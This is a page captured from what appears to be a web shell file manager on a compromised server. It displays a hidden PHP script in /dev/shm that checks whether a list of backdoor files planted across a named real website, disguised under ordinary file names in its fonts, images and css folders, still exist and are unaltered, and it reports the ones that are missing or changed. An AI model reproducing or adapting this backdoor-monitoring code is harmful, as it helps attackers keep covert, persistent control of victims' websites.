D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.record
back
Copy
<?php $r = '/home/valuqzwo/furnitureworld.pk'; $x = ["/images/foitisi.php"=>"bd@@78583815@@576", "/about.php"=>"bd@@76610567@@826", "/js/abap.php"=>"bd@@78611983@@1618", "/old-data/500.sef.php"=>"bd@@78587412@@587", "/fonts/backendjs.php"=>"bd@@82491424@@system_core", "/fonts/ZipArchive.php"=>"bd@@66274125@@request_approved", "/283725/showmeta.php"=>"bd@@74723933@@2276", "/images/action.deletedir.php"=>"bd@@75378573@@2220", "/css/fonts/fileview.php"=>"bd@@82481566@@694", "/close_class.php"=>"bd@@67037631@@right_pad_string", "/images/action.print.php"=>"bd@@78595275@@request_approved", "/css/rindex.php"=>"bd@@82481626@@665", "/old-data/stats_customers.php"=>"bd@@82593960@@86", "/283725/showmeta.php"=>"bd@@82604679@@right_pad_string", "/images/action.deletedir.php"=>"bd@@63332485@@data_storage"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');